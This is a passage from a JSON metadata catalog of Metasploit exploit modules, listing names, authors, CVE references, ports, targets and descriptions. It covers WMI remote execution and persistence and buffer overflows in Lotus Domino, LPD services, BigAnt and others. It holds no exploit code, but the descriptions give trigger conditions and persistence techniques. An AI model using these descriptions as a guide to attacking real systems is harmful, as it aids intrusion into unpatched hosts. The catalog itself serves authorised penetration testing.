"name": "Windows Management Instrumentation (WMI) Remote Command Execution",
"full_name": "exploit/windows/local/wmi",
"rank": 600,
"disclosure_date": "1999-01-01",
"type": "exploit",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module executes powershell on the remote host using the current\n user credentials or those supplied. Instead of using PSEXEC over TCP\n port 445 we use the WMIC command to start a Remote Procedure Call on\n TCP port 135 and an ephemeral port. Set ReverseListenerComm to tunnel\n traffic through that session.\n\n The result is similar to psexec but with the added benefit of using\n the session's current authentication token instead of having to know\n a password or hash.\n\n The remote host must be configured to allow remote Windows Management\n Instrumentation.",
"references": [
"CVE-1999-0504",
"OSVDB-3106",
"URL-http://passing-the-hash.blogspot.co.uk/2013/07/WMIS-PowerSploit-Shells.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-03-29 18:14:56 +0000",
"path": "/modules/exploits/windows/local/wmi.rb",
"is_install_path": true,
"ref_name": "windows/local/wmi",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/wmi_persistence": {
"name": "WMI Event Subscription Persistence",
"full_name": "exploit/windows/local/wmi_persistence",
"rank": 300,
"disclosure_date": "2017-06-06",
"type": "exploit",
"author": [
"Nick Tyrer <@NickTyrer>"
],
"description": "This module will create a permanent WMI event subscription to achieve file-less persistence using one\n of five methods. The EVENT method will create an event filter that will query the event log for an EVENT_ID_TRIGGER\n (default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER (note: failed logon auditing\n must be enabled on the target for this method to work, this can be enabled using \"auditpol.exe /set /subcategory:Logon\n /failure:Enable\"). When these criteria are met a command line event consumer will trigger an encoded powershell payload.\n The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL. The LOGON\n method will create an event filter that will trigger the payload after the system has an uptime of 4 minutes. The PROCESS\n method will create an event filter that triggers the payload when the specified process is started. The WAITFOR method\n creates an event filter that utilizes the Microsoft binary waitfor.exe to wait for a signal specified by WAITFOR_TRIGGER\n before executing the payload. The signal can be sent from a windows host on a LAN utilizing the waitfor.exe command\n (note: requires target to have port 445 open). Additionally a custom command can be specified to run once the trigger is\n activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a\n high integrity process. It is also recommended not to use stageless payloads due to powershell script length limitations.",
"references": [
"URL-https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf",
"URL-https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/local/wmi_persistence.rb",
"is_install_path": true,
"ref_name": "windows/local/wmi_persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/lotus/domino_http_accept_language": {
"name": "IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow",
"full_name": "exploit/windows/lotus/domino_http_accept_language",
"rank": 200,
"disclosure_date": "2008-05-20",
"type": "exploit",
"author": [
"Fairuzan Roslan <riaf@mysec.org>",
"Earl Marcus klks <Earl Marcus klks@mysec.org>"
],
"description": "This module exploits a stack buffer overflow in IBM Lotus Domino Web Server\n prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP\n request with an Accept-Language header greater than 114 bytes.",
"references": [
"CVE-2008-2240",
"OSVDB-45415",
"BID-29310",
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg21303057"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Lotus Domino 7.0 on Windows 2003 SP1 English(NX)",
"Lotus Domino 7.0 on Windows 2003 SP2 English(NX)",
"Lotus Domino 7.0 on Windows 2003/2000/XP English(NO NX)",
"Lotus Domino 8.0 on Windows 2003 SP1 English(NX)",
"Lotus Domino 8.0 on Windows 2003 SP2 English(NX)",
"Lotus Domino 8.0 on Windows 2003/2000/XP English(NO NX)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/lotus/domino_http_accept_language.rb",
"is_install_path": true,
"ref_name": "windows/lotus/domino_http_accept_language",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/lotus/domino_icalendar_organizer": {
"name": "IBM Lotus Domino iCalendar MAILTO Buffer Overflow",
"full_name": "exploit/windows/lotus/domino_icalendar_organizer",
"rank": 300,
"disclosure_date": "2010-09-14",
"type": "exploit",
"author": [
"A. Plaskett",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in IBM Lotus Domino iCalendar. By\n sending a long string of data as the \"ORGANIZER;mailto\" header, process \"nRouter.exe\"\n crashes due to a Cstrcpy() routine in nnotes.dll, which allows remote attackers to\n gain arbitrary code execution.\n\n Note: In order to trigger the vulnerable code path, a valid Domino mailbox account\n is needed.",
"references": [
"CVE-2010-3407",
"OSVDB-68040",
"ZDI-10-177",
"URL-http://labs.mwrinfosecurity.com/advisories/lotus_domino_ical_stack_buffer_overflow/",
"URL-http://www-01.ibm.com/support/docview.wss?rs=475&uid=swg21446515"
],
"platform": "Windows",
"arch": "",
"rport": 25,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Lotus Domino 8.5 on Windows 2000 SP4",
"Lotus Domino 8.5 on Windows Server 2003 SP0",
"Lotus Domino 8.5 on Windows Server 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/lotus/domino_icalendar_organizer.rb",
"is_install_path": true,
"ref_name": "windows/lotus/domino_icalendar_organizer",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/lotus/domino_sametime_stmux": {
"name": "IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow",
"full_name": "exploit/windows/lotus/domino_sametime_stmux",
"rank": 200,
"disclosure_date": "2008-05-21",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>",
"riaf <riaf@mysec.org>"
],
"description": "This module exploits a stack buffer overflow in Lotus Domino\\'s Sametime\n Server. By sending an overly long POST request to the Multiplexer\n STMux.exe service we are able to overwrite SEH. Based on the exploit\n by Manuel Santamarina Suarez.",
"references": [
"CVE-2008-2499",
"OSVDB-45610",
"BID-29328",
"ZDI-08-028"
],
"platform": "Windows",
"arch": "x86",
"rport": 1533,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Lotus Sametime 7.5 on Windows Server 2000 SP4",
"Lotus Sametime 7.5 on Windows Server 2003 SP1",
"Lotus Sametime 7.5 on Windows Server 2003 SP2",
"Lotus Sametime 7.5.1 Windows Server 2003 SP2",
"Lotus Sametime 8.0.0 Windows Server 2003 SP2"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/lotus/domino_sametime_stmux.rb",
"is_install_path": true,
"ref_name": "windows/lotus/domino_sametime_stmux",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/lotus/lotusnotes_lzh": {
"name": "Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)",
"full_name": "exploit/windows/lotus/lotusnotes_lzh",
"rank": 300,
"disclosure_date": "2011-05-24",
"type": "exploit",
"author": [
"binaryhouse.net",
"alino <26alino@gmail.com>"
],
"description": "This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when\n parsing a malformed, specially crafted LZH file. This vulnerability was\n discovered binaryhouse.net",
"references": [
"CVE-2011-1213",
"OSVDB-72706",
"BID-48018",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904",
"URL-http://www.ibm.com/support/docview.wss?uid=swg21500034"
],
"platform": "Windows",
"arch": "",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": [
"Lotus Notes 8.0.x - 8.5.2 FP2 / Windows Universal",
"Lotus Notes 8.5.2 FP2 / Windows Universal / DEP"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/lotus/lotusnotes_lzh.rb",
"is_install_path": true,
"ref_name": "windows/lotus/lotusnotes_lzh",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/lpd/hummingbird_exceed": {
"name": "Hummingbird Connectivity 10 SP5 LPD Buffer Overflow",
"full_name": "exploit/windows/lpd/hummingbird_exceed",
"rank": 200,
"disclosure_date": "2005-05-27",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Hummingbird Connectivity\n 10 LPD Daemon. This module has only been tested against Hummingbird\n Exceed v10 with SP5.",
"references": [
"CVE-2005-1815",
"OSVDB-16957",
"BID-13788"
],
"platform": "Windows",
"arch": "",
"rport": 515,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 2000 English SP0-SP4",
"Windows XP English SP0/SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/lpd/hummingbird_exceed.rb",
"is_install_path": true,
"ref_name": "windows/lpd/hummingbird_exceed",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/lpd/niprint": {
"name": "NIPrint LPD Request Overflow",
"full_name": "exploit/windows/lpd/niprint",
"rank": 400,
"disclosure_date": "2003-11-05",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the\n Network Instrument NIPrint LPD service. Inspired by\n Immunity's VisualSploit :-)",
"references": [
"CVE-2003-1141",
"OSVDB-2774",
"BID-8968",
"URL-http://www.immunitysec.com/documentation/vs_niprint.html"
],
"platform": "Windows",
"arch": "",
"rport": 515,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"NIPrint3.EXE (TDS:0x3a045ff2)",
"Windows XP SP3",
"Windows 7 x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/lpd/niprint.rb",
"is_install_path": true,
"ref_name": "windows/lpd/niprint",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/lpd/saplpd": {
"name": "SAP SAPLPD 6.28 Buffer Overflow",
"full_name": "exploit/windows/lpd/saplpd",
"rank": 400,
"disclosure_date": "2008-02-04",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in SAPlpd 6.28 (SAP Release 6.40) .\n By sending an overly long argument, an attacker may be able to execute arbitrary\n code.",
"references": [
"CVE-2008-0621",
"OSVDB-41127",
"BID-27613"
],
"platform": "Windows",
"arch": "",
"rport": 515,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"SAPlpd 6.28.0.1 (SAP Release 6.40)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/lpd/saplpd.rb",
"is_install_path": true,
"ref_name": "windows/lpd/saplpd",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/lpd/wincomlpd_admin": {
"name": "WinComLPD Buffer Overflow",
"full_name": "exploit/windows/lpd/wincomlpd_admin",
"rank": 400,
"disclosure_date": "2008-02-04",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in WinComLPD <= 3.0.2.\n By sending an overly long authentication packet to the remote\n administration service, an attacker may be able to execute arbitrary\n code.",
"references": [
"CVE-2008-5159",
"OSVDB-42861",
"BID-27614"
],
"platform": "Windows",
"arch": "",
"rport": 13500,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"WinComLPD 3.0.2.623"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/lpd/wincomlpd_admin.rb",
"is_install_path": true,
"ref_name": "windows/lpd/wincomlpd_admin",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/achat_bof": {
"name": "Achat Unicode SEH Buffer Overflow",
"full_name": "exploit/windows/misc/achat_bof",
"rank": 300,
"disclosure_date": "2014-12-18",
"type": "exploit",
"author": [
"Peter Kasza <peter.kasza@itinsight.hu>",
"Balazs Bucsay <balazs.bucsay@rycon.hu>"
],
"description": "This module exploits a Unicode SEH buffer overflow in Achat. By\n sending a crafted message to the default port 9256/UDP, it's possible to overwrite the\n SEH handler. Even when the exploit is reliable, it depends on timing since there are\n two threads overflowing the stack in the same time. This module has been tested on\n Achat v0.150 running on Windows XP SP3 and Windows 7.",
"references": [
"CWE-121"
],
"platform": "Windows",
"arch": "",
"rport": 9256,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/achat_bof.rb",
"is_install_path": true,
"ref_name": "windows/misc/achat_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/actfax_raw_server_bof": {
"name": "ActFax 5.01 RAW Server Buffer Overflow",
"full_name": "exploit/windows/misc/actfax_raw_server_bof",
"rank": 300,
"disclosure_date": "2013-02-05",
"type": "exploit",
"author": [
"Craig Freyman",
"corelanc0d3r",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in ActFax Server 5.01 RAW server. The RAW\n Server can be used to transfer fax messages without any underlying protocols. To\n note significant fields in the fax being transferred, like the fax number or the\n recipient, ActFax data fields can be used. This module exploits a buffer overflow\n in the handling of the @F506 fields due to the insecure usage of strcpy. This\n module has been tested successfully on ActFax 5.01 over Windows XP SP3 (English).",
"references": [
"OSVDB-89944",
"BID-57789",
"EDB-24467",
"URL-http://www.pwnag3.com/2013/02/actfax-raw-server-exploit.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"ActFax 5.01 / Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/actfax_raw_server_bof.rb",
"is_install_path": true,
"ref_name": "windows/misc/actfax_raw_server_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/agentxpp_receive_agentx": {
"name": "AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow",
"full_name": "exploit/windows/misc/agentxpp_receive_agentx",
"rank": 400,
"disclosure_date": "2010-04-16",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This exploits a stack buffer overflow in the AgentX++ library, as used by\n various applications. By sending a specially crafted request, an attacker can\n execute arbitrary code, potentially with SYSTEM privileges.\n\n This module was tested successfully against master.exe as included with Real\n Network\\'s Helix Server v12. When installed as a service with Helix Server,\n the service runs as SYSTEM, has no recovery action, but will start automatically\n on boot.\n\n This module does not work with NX/XD enabled but could be modified easily to\n do so. The address",
"references": [
"CVE-2010-1318",
"OSVDB-63919",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=867"
],
"platform": "Windows",
"arch": "",
"rport": 705,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Helix Server v12 and v13 - master.exe"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/agentxpp_receive_agentx.rb",
"is_install_path": true,
"ref_name": "windows/misc/agentxpp_receive_agentx",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/ais_esel_server_rce": {
"name": "AIS logistics ESEL-Server Unauth SQL Injection RCE",
"full_name": "exploit/windows/misc/ais_esel_server_rce",
"rank": 600,
"disclosure_date": "2019-03-27",
"type": "exploit",
"author": [
"Manuel Feifel"
],
"description": "This module will execute an arbitrary payload on an \"ESEL\" server used by the\n AIS logistic software. The server typically listens on port 5099 without TLS.\n There could also be server listening on 5100 with TLS but the port 5099 is\n usually always open.\n The login process is vulnerable to an SQL Injection. Usually a MSSQL Server\n with the 'sa' user is in place.\n\n This module was verified on version 67 but it should also run on lower versions.\n An fixed version was created by AIS in September 2017. However most systems\n have not been updated.\n\n In regard to the payload, unless there is a closed port in the web server,\n you dont want to use any \"bind\" payload. You want a \"reverse\" payload,\n probably to your port 80 or to any other outbound port allowed on the firewall.\n\n Currently, one delivery method is supported\n\n This method takes advantage of the Command Stager subsystem. This allows using\n various techniques, such as using a TFTP server, to send the executable. By default\n the Command Stager uses 'wcsript.exe' to generate the executable on the target.\n\n NOTE: This module will leave a payload executable on the target system when the\n attack is finished.",
"references": [
"CVE-2019-10123"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 5099,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-04-25 18:24:26 +0000",
"path": "/modules/exploits/windows/misc/ais_esel_server_rce.rb",
"is_install_path": true,
"ref_name": "windows/misc/ais_esel_server_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/allmediaserver_bof": {
"name": "ALLMediaServer 0.8 Buffer Overflow",
"full_name": "exploit/windows/misc/allmediaserver_bof",
"rank": 300,
"disclosure_date": "2012-07-04",
"type": "exploit",
"author": [
"motaz reda <motazkhodair@gmail.com>",
"modpr0be <tom@spentera.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in ALLMediaServer 0.8. The vulnerability\n is caused due to a boundary error within the handling of HTTP request.\n\n While the exploit supports DEP bypass via ROP, on Windows 7 the stack pivoting isn't\n reliable across virtual (VMWare, VirtualBox) and physical environments. Because of\n this the module isn't using DEP bypass on the Windows 7 SP1 target, where by default\n DEP is OptIn and AllMediaServer won't run with DEP.",
"references": [
"CVE-2017-17932",
"OSVDB-83889",
"EDB-19625"
],
"platform": "Windows",
"arch": "",
"rport": 888,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"ALLMediaServer 0.8 / Windows XP SP3 - English",
"ALLMediaServer 0.8 / Windows 7 SP1 - English"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/misc/allmediaserver_bof.rb",
"is_install_path": true,
"ref_name": "windows/misc/allmediaserver_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/altiris_ds_sqli": {
"name": "Symantec Altiris DS SQL Injection",
"full_name": "exploit/windows/misc/altiris_ds_sqli",
"rank": 300,
"disclosure_date": "2008-05-15",
"type": "exploit",
"author": [
"Brett Moore",
"3v0lver"
],
"description": "This module exploits a SQL injection flaw in Symantec Altiris Deployment Solution 6.8\n to 6.9.164. The vulnerability exists on axengine.exe which fails to adequately sanitize\n numeric input fields in \"UpdateComputer\" notification Requests. In order to spawn a shell,\n several SQL injections are required in close succession, first to enable xp_cmdshell, then\n retrieve the payload via TFTP and finally execute it. The module also has the capability\n to disable or enable local application authentication. In order to work the target system\n must have a tftp client available.",
"references": [
"CVE-2008-2286",
"OSVDB-45313",
"BID-29198",
"URL-http://www.zerodayinitiative.com/advisories/ZDI-08-024"
],
"platform": "Windows",
"arch": "",
"rport": 402,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2003 (with tftp client available)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/altiris_ds_sqli.rb",
"is_install_path": true,
"ref_name": "windows/misc/altiris_ds_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/apple_quicktime_rtsp_response": {
"name": "Apple QuickTime 7.3 RTSP Response Header Buffer Overflow",
"full_name": "exploit/windows/misc/apple_quicktime_rtsp_response",
"rank": 300,
"disclosure_date": "2007-11-23",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Apple QuickTime 7.3. By sending an overly long\n RTSP response to a client, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2007-6166",
"OSVDB-40876",
"BID-26549",
"EDB-4648"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"QuickTime 7.3, QuickTime Player 7.3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb",
"is_install_path": true,
"ref_name": "windows/misc/apple_quicktime_rtsp_response",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/asus_dpcproxy_overflow": {
"name": "Asus Dpcproxy Buffer Overflow",
"full_name": "exploit/windows/misc/asus_dpcproxy_overflow",
"rank": 200,
"disclosure_date": "2008-03-21",
"type": "exploit",
"author": [
"Jacopo Cervini"
],
"description": "This module exploits a stack buffer overflow in Asus Dpcroxy version 2.0.0.19.\n It should be vulnerable until version 2.0.0.24.\n Credit to Luigi Auriemma",
"references": [
"CVE-2008-1491",
"OSVDB-43638",
"BID-28394"
],
"platform": "Windows",
"arch": "",
"rport": 623,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Asus Dpcroxy version 2.00.19 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb",
"is_install_path": true,
"ref_name": "windows/misc/asus_dpcproxy_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/avaya_winpmd_unihostrouter": {
"name": "Avaya WinPMD UniteHostRouter Buffer Overflow",
"full_name": "exploit/windows/misc/avaya_winpmd_unihostrouter",
"rank": 300,
"disclosure_date": "2011-05-23",
"type": "exploit",
"author": [
"AbdulAziz Hariri",
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Avaya WinPMD. The vulnerability\n exists in the UniteHostRouter service, due to the insecure usage of memcpy when\n parsing specially crafted \"To:\" headers. The module has been tested successfully on\n Avaya WinPMD 3.8.2 over Windows XP SP3 and Windows 2003 SP2.",
"references": [
"OSVDB-82764",
"OSVDB-73269",
"BID-47947",
"EDB-18397",
"URL-https://downloads.avaya.com/css/P8/documents/100140122",
"URL-http://secunia.com/advisories/44062"
],
"platform": "Windows",
"arch": "",
"rport": 3217,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Avaya WinPMD 3.8.2 / Windows XP SP3",
"Avaya WinPMD 3.8.2 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb",
"is_install_path": true,
"ref_name": "windows/misc/avaya_winpmd_unihostrouter",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/avidphoneticindexer": {
"name": "Avid Media Composer 5.5 - Avid Phonetic Indexer Buffer Overflow",
"full_name": "exploit/windows/misc/avidphoneticindexer",
"rank": 300,
"disclosure_date": "2011-11-29",
"type": "exploit",
"author": [
"vt [nick.freeman <vt [nick.freeman@security-assessment.com]>"
],
"description": "This module exploits a stack buffer overflow in process\n AvidPhoneticIndexer.exe (port 4659), which comes as part of the Avid Media Composer\n 5.5 Editing Suite. This daemon sometimes starts on a different port; if you start\n it standalone it will run on port 4660.",
"references": [
"CVE-2011-5003",
"OSVDB-77376",
"URL-http://www.security-assessment.com/files/documents/advisory/Avid_Media_Composer-Phonetic_Indexer-Remote_Stack_Buffer_Overflow.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 4659,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP Professional SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/avidphoneticindexer.rb",
"is_install_path": true,
"ref_name": "windows/misc/avidphoneticindexer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/bakbone_netvault_heap": {
"name": "BakBone NetVault Remote Heap Overflow",
"full_name": "exploit/windows/misc/bakbone_netvault_heap",
"rank": 200,
"disclosure_date": "2005-04-01",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"nolimit.bugtraq <nolimit.bugtraq@ri0tnet.net>"
],
"description": "This module exploits a heap overflow in the BakBone NetVault\n Process Manager service. This code is a direct port of the netvault.c\n code written by nolimit and BuzzDee.",
"references": [
"CVE-2005-1009",
"OSVDB-15234",
"BID-12967"
],
"platform": "Windows",
"arch": "",
"rport": 20031,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 2000 SP4 English",
"Windows XP SP0/SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/bakbone_netvault_heap.rb",
"is_install_path": true,
"ref_name": "windows/misc/bakbone_netvault_heap",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/bcaaa_bof": {
"name": "Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow",
"full_name": "exploit/windows/misc/bcaaa_bof",
"rank": 400,
"disclosure_date": "2011-04-04",
"type": "exploit",
"author": [
"Paul Harrington",
"Travis Warren",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in process bcaaa-130.exe (port 16102),\n which comes as part of the Blue Coat Authentication proxy. Please note that by default,\n this exploit will attempt up to three times in order to successfully gain remote code\n execution (in some cases, it takes as many as five times). This can cause your activity\n to look even more suspicious. To modify the number of exploit attempts, set the\n ATTEMPTS option.",
"references": [
"CVE-2011-5124",
"OSVDB-72095",
"URL-https://kb.bluecoat.com/index?page=content&id=SA55",
"URL-https://seclists.org/bugtraq/2011/Jul/44"
],
"platform": "Windows",
"arch": "",
"rport": 16102,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"BCAAA Version 5.4.6.1.54128"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/misc/bcaaa_bof.rb",
"is_install_path": true,
"ref_name": "windows/misc/bcaaa_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/bigant_server": {
"name": "BigAnt Server 2.2 Buffer Overflow",
"full_name": "exploit/windows/misc/bigant_server",
"rank": 200,
"disclosure_date": "2008-04-15",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in BigAnt Server 2.2.\n By sending a specially crafted packet, an attacker may be\n able to execute arbitrary code.",
"references": [
"CVE-2008-1914",
"OSVDB-44454",
"BID-28795"
],
"platform": "Windows",
"arch": "",
"rport": 6080,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro All English",
"Windows XP Pro SP0/SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/bigant_server.rb",
"is_install_path": true,
"ref_name": "windows/misc/bigant_server",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/bigant_server_250": {
"name": "BigAnt Server 2.50 SP1 Buffer Overflow",
"full_name": "exploit/windows/misc/bigant_server_250",
"rank": 500,
"disclosure_date": "2008-04-15",
"type": "exploit",
"author": [
"Dr_IDE <Dr_IDE@hushmail.com>"
],
"description": "This exploits a stack buffer overflow in the BigAnt Messaging Service,\n part of the BigAnt Server product suite. This module was tested\n successfully against version 2.50 SP1.",
"references": [
"CVE-2008-1914",
"OSVDB-44454",
"EDB-9673",
"EDB-9690"
],
"platform": "Windows",
"arch": "",
"rport": 6660,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"BigAnt 2.5 Universal",
"Windows 2000 Pro All English",
"Windows XP Pro SP0/SP1 English"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/misc/bigant_server_250.rb",
"is_install_path": true,
"ref_name": "windows/misc/bigant_server_250",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/bigant_server_dupf_upload": {
"name": "BigAnt Server DUPF Command Arbitrary File Upload",
"full_name": "exploit/windows/misc/bigant_server_dupf_upload",
"rank": 600,
"disclosure_date": "2013-01-09",
"type": "exploit",
"author": [
"Hamburgers Maccoy",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This exploits an arbitrary file upload vulnerability in BigAnt Server 2.97 SP7.\n A lack of authentication allows to make unauthenticated file uploads through a DUPF\n command. Additionally the filename option in the same command can be used to launch\n a directory traversal attack and achieve arbitrary file upload.\n\n The module uses the Windows Management Instrumentation service to execute an\n arbitrary payload on vulnerable installations of BigAnt on Windows XP and 2003. It\n has been successfully tested on BigAnt Server 2.97 SP7 over Windows XP SP3 and 2003\n SP2.",
"references": [
"CVE-2012-6274",
"US-CERT-VU-990652",
"BID-57214",
"OSVDB-89342"
],
"platform": "Windows",
"arch": "",
"rport": 6661,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"BigAnt Server 2.97 SP7"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/misc/bigant_server_dupf_upload.rb",
"is_install_path": true,
"ref_name": "windows/misc/bigant_server_dupf_upload",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/bigant_server_sch_dupf_bof": {
"name": "BigAnt Server 2 SCH And DUPF Buffer Overflow",
"full_name": "exploit/windows/misc/bigant_server_sch_dupf_bof",
"rank": 300,
"disclosure_date": "2013-01-09",
